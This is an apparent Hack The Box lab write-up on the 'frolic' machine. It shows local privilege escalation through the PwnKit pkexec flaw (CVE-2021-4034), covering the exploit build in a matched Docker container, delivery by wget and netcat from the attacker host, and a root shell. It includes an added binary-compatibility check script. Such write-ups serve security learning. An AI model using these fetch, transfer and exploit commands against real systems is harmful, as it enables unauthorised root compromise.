CVE-2021-4034


The PEASS scan (LinPEAS) flagged the target system as vulnerable to CVE-2021-4034 (PwnKit).

A vulnerability classified as critical has been found in polkit (version unknown). It affects the setuid-root helper /usr/bin/pkexec: when pkexec is executed with an empty argument list (argc == 0), its argument handling reads and writes past the end of argv into the adjacent environment block, so an unprivileged local user can reintroduce an unsafe variable such as GCONV_PATH (which the dynamic loader strips for setuid programs) and obtain a root shell. The problem is catalogued as CWE-284 (improper access control): the software does not restrict, or incorrectly restricts, access to a resource from an unauthorized actor. Confidentiality, integrity and availability are all impacted.

exploit (pwnkit)


The exploit (PwnKit) is publicly available.

www-data@frolic:~$ make ; gcc ;cc
make: *** No targets specified and no makefile found.  Stop.
gcc: fatal error: no input files
compilation terminated.
cc: fatal error: no input files
compilation terminated.

The target system appears to have a toolchain installed (make, gcc and cc all respond), so the exploit should be compilable locally.

┌──(kali㉿kali)-[~/archive/htb/labs/frolic]
└─$ git clone https://github.com/berdav/CVE-2021-4034.git ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Receiving objects: 100% (92/92), 22.71 KiB | 3.78 MiB/s, done.
Resolving deltas: 100% (44/44), done.

Downloading and packaging the exploit

Exploitation (Failed)


www-data@frolic:/dev/shm$ wget -q http://10.10.16.8/CVE-2021-4034.tar.gz ; tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Delivery complete

www-data@frolic:/dev/shm/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc: error trying to exec 'cc1': execvp: No such file or directory
makefile:21: recipe for target 'pwnkit.so' failed
make: *** [pwnkit.so] Error 1

Compilation failed because cc1 (the compiler proper) is missing; only the gcc driver is installed. The exploit must therefore be built elsewhere, on a system whose architecture and glibc match the target.

Docker Exploit Development


The target system is a 32-bit i686 system. There is a Docker image for Ubuntu 16.04 in the i386 architecture; i386 is an older, smaller instruction set than i686, but i686 is backward-compatible with it, so code built for i386 runs on i686. The image's glibc (2.23) must also not be newer than the target's, since a binary linked against a newer glibc fails with version-symbol errors on an older system.

┌──(kali㉿kali)-[~/archive/htb/labs/frolic]
└─$ docker run -it --entrypoint "/bin/bash" --name frolic i386/ubuntu:16.04
 
root@48e042037aeb:/# ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Starting a Docker container and confirming the glibc version

root@48e042037aeb:/# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make git ; cd root

Installing necessary packages

root@48e042037aeb:~# git clone https://github.com/berdav/CVE-2021-4034.git ; cd CVE-2021-4034 ; make ; cd .. ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Unpacking objects: 100% (92/92), done.
Checking connectivity... done.
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.

Downloading, compiling and packaging the exploit
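Before shipping a binary built elsewhere, it is worth checking the two things that went wrong or had to be matched above: whether a host has a working compiler (not just the gcc driver without cc1), and whether the build's ELF class and required glibc fit the target. The script below is an added example, not part of the original write-up or the PwnKit repository. It assumes binutils (readelf) for live use; the readelf excerpts embedded in it are constructed sample output so the parsing and comparison functions run offline.

```shell
#!/bin/sh
# Added example (not from the original write-up): pre-flight checks before
# pushing a binary built on another host to the target. The readelf excerpts
# below are constructed sample output; live_check runs the real tools.

# Does this host have a *working* C compiler, or only the gcc driver?
# A test compile catches the "error trying to exec 'cc1'" case above.
have_working_cc() {
    tmp=$(mktemp -d) || return 1
    printf 'int main(void){return 0;}\n' > "$tmp/t.c"
    if cc -o "$tmp/t" "$tmp/t.c" 2>/dev/null; then rc=0; else rc=1; fi
    rm -rf "$tmp"
    return $rc
}

# Highest GLIBC_x.y version symbol a binary imports, read from
# `readelf --dyn-syms <binary>` output on stdin. Prints e.g. "2.34".
required_glibc() {
    grep -o 'GLIBC_[0-9][0-9.]*' | sed 's/^GLIBC_//' | sort -V | tail -n 1
}

# ELF class ("ELF32" or "ELF64") from `readelf -h <binary>` output on stdin.
elf_class() {
    sed -n 's/^ *Class: *//p' | head -n 1
}

# True when the target's glibc ($1) is at least the build's requirement ($2).
# sort -V compares numerically, so 2.23 correctly ranks above 2.3.
glibc_satisfies() {
    [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$2" ]
}

# Verdict on already-extracted facts: target glibc, target class,
# binary's required glibc, binary's class. Prints OK or the mismatch.
compat_verdict() {
    target_glibc=$1; target_class=$2; need_glibc=$3; bin_class=$4
    if [ "$bin_class" != "$target_class" ]; then
        echo "MISMATCH: binary is $bin_class, target needs $target_class"; return 1
    fi
    if ! glibc_satisfies "$target_glibc" "$need_glibc"; then
        echo "MISMATCH: binary needs glibc $need_glibc, target has $target_glibc"; return 1
    fi
    echo "OK: $bin_class binary, glibc $need_glibc <= $target_glibc"
}

# Live use on a real file, e.g.: live_check ./cve-2021-4034 2.23 ELF32
live_check() {
    need=$(readelf --dyn-syms "$1" | required_glibc)
    cls=$(readelf -h "$1" | elf_class)
    compat_verdict "$2" "$3" "$need" "$cls"
}

# Constructed readelf excerpts: a 64-bit build against a modern glibc,
# i.e. exactly what a default build on a current Kali would produce.
SAMPLE_DYNSYMS='
     1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND setresuid@GLIBC_2.2.5 (2)
     2: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __libc_start_main@GLIBC_2.34 (3)
     3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND execve@GLIBC_2.2.5 (2)'
SAMPLE_HEADER='ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF64
  Machine:                           Advanced Micro Devices X86-64'

# Run with "demo" to evaluate the constructed sample against a
# 32-bit, glibc 2.23 target like the one in this write-up.
if [ "${1:-}" = "demo" ]; then
    need=$(printf '%s\n' "$SAMPLE_DYNSYMS" | required_glibc)
    cls=$(printf '%s\n' "$SAMPLE_HEADER" | elf_class)
    compat_verdict 2.23 ELF32 "$need" "$cls"
fi
```

Run on the binary produced in the container (`live_check ./cve-2021-4034 2.23 ELF32`) it should report OK; run on a default Kali build it reports the ELF64 mismatch first, which is the reason the i386/ubuntu:16.04 container was needed.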

root@48e042037aeb:~# nc 10.10.10.111 2222 < CVE-2021-4034.tar.gz 
www-data@frolic:/dev/shm$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on [0.0.0.0] (family 0, port 2222)
Connection from [10.10.16.8] port 2222 [tcp/*] accepted (family 2, sport 35272)

Delivery complete. The listener on the target must be started before the sender connects, and since nc gives no integrity check, comparing sha256sum output on both sides confirms the archive arrived intact.

Exploitation


www-data@frolic:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Unpacking

www-data@frolic:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
frolic
# ifconfig
ifconfig
ens33     Link encap:Ethernet  HWaddr 00:50:56:b9:eb:ab  
          inet addr:10.10.10.111  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:ebab/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:ebab/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1238763 errors:354 dropped:1132 overruns:0 frame:0
          TX packets:1225747 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:198656960 (198.6 MB)  TX bytes:414417041 (414.4 MB)
          Interrupt:19 Base address:0x2000 
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:138990 errors:0 dropped:0 overruns:0 frame:0
          TX packets:138990 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:10284882 (10.2 MB)  TX bytes:10284882 (10.2 MB)

System level compromise: the exploit returned a root shell on the target.

┌──(kali㉿kali)-[~/archive/htb/labs/frolic]
└─$ docker rm frolic
frolic

Removing the build container once the exploit has been delivered